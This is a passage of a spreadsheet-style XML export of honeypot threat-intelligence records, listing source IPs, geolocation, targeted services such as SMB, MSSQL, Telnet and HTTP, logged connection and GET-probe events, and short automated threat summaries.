    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MSSQL_H8"/>
    <s v="1433&amp;&amp;445&amp;&amp;53901&amp;&amp;53936&amp;&amp;60163"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Dhaka (Motijheel)"/>
    <s v="1185241"/>
    <s v="1000"/>
    <s v="23.7299"/>
    <s v="90.4172"/>
    <s v="139278"/>
    <s v="data edge limited"/>
    <s v="data edge limited"/>
    <s v="business"/>
    <s v="data edge limited"/>
    <s v="2019-07-02"/>
    <s v="DATAEDGELIMITED-BD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61556)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61572)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,62009)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57109)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57116)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57624)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51217)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51247)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51870)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,58677)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,58729)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,59326)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,50626)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,50632)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51137)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,60683)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,60715)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61197)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,52153)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,63885)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,63981)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,64724)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,64734)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678c:b484"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A malicious client is attempting to connect to a shared resource from an IP address that may be associated with malicious activity. This could be an attempt at unauthorized file sharing or data theft. The IP address and port number suggest a potential exploitation of SMB vulnerabilities. &amp;&amp; Possible malicious activity involves an unknown computer attempting to connect to a shared resource on the monitored system using a potential vulnerability or misconfiguration, possibly for unauthorized access or exploitation. This attempt may be made by a malicious entity located at IP address 103.140.180.132, likely trying to exploit a specific service or feature. The connection is being established via port 64724. &amp;&amp; An incoming connection from an unknown IP address is detected for a potentially vulnerable SMB service._x000a_This could be a sign of a potential scanning or probing activity for vulnerabilities._x000a_Further investigation is required to determine the intent behind this connection. &amp;&amp; An incoming connection is attempted from an IP address attempting to access shared resources on the system. This may be a probing activity or the start of unauthorized file transfer. The client's identity and purpose are unknown at this point."/>
    <s v="SMB Attack &amp;&amp; Port Scanning"/>
  </r>
  <r>
    <x v="817"/>
    <x v="817"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:12:43"/>
    <d v="2025-04-15T18:57:10"/>
    <d v="2025-04-25T22:12:43"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA&amp;&amp;38089"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Naju-si"/>
    <s v="Naju (Jinheung-gil)"/>
    <s v="1840536"/>
    <s v="NA"/>
    <s v="35.0185"/>
    <s v="126.795"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d263:6ab1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is conducting reconnaissance and attempting to exploit vulnerabilities in various systems, likely for malicious purposes such as data exfiltration or lateral movement."/>
    <s v="Scanning"/>
  </r>
  <r>
    <x v="818"/>
    <x v="818"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:12:34"/>
    <d v="2023-12-09T08:53:00"/>
    <d v="2025-04-25T22:12:34"/>
    <n v="1563"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;19738&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Group"/>
    <s v="residential"/>
    <s v="VIETTEL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,49446)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,52347)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,59831)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,60369)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,57373)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,58042)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,63940)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,64519)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b48:5272"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="819"/>
    <x v="819"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:12:24"/>
    <d v="2024-12-23T08:39:15"/>
    <d v="2025-04-25T22:12:24"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a9d3:e486"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, therefore unable to analyze any malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="820"/>
    <x v="820"/>
    <s v="NA&amp;&amp;47-154-58-227.fdr01.ccmn.ca.ip.frontiernet.net"/>
    <x v="0"/>
    <d v="2025-04-25T22:11:51"/>
    <d v="2025-03-24T19:12:40"/>
    <d v="2025-04-25T22:11:51"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="San Bernardino"/>
    <s v="Rancho Cucamonga"/>
    <s v="5385955"/>
    <s v="91729"/>
    <s v="34.1064"/>
    <s v="-117.593"/>
    <s v="5650"/>
    <s v="Frontier Communications of America, Inc."/>
    <s v="Frontier Communications Corporation"/>
    <s v="business"/>
    <s v="Frontier Communications Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f9a:3ae3"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided, therefore I have nothing to analyze or report on possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="821"/>
    <x v="821"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:11:40"/>
    <d v="2024-04-09T11:41:00"/>
    <d v="2025-04-25T22:11:40"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;50816&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="19"/>
    <s v="Almaty Oblysy"/>
    <s v="NA"/>
    <s v="Almaty (Medeū)"/>
    <s v="1526384"/>
    <s v="050000"/>
    <s v="43.2295"/>
    <s v="76.9598"/>
    <s v="21299"/>
    <s v="Kar-Tel LLC"/>
    <s v="2DAY Telecom LLP"/>
    <s v="business"/>
    <s v="Orbita-plus LLP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:551d:8938"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="822"/>
    <x v="822"/>
    <s v="NA&amp;&amp;ca-san-us-gd17-wk102a.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-25T22:11:03"/>
    <d v="2024-04-02T13:22:00"/>
    <d v="2025-04-25T22:11:03"/>
    <n v="326"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SSH_H18&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;35772&amp;&amp;8443&amp;&amp;NA&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="NA"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7128"/>
    <s v="-74.006"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="ICG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': 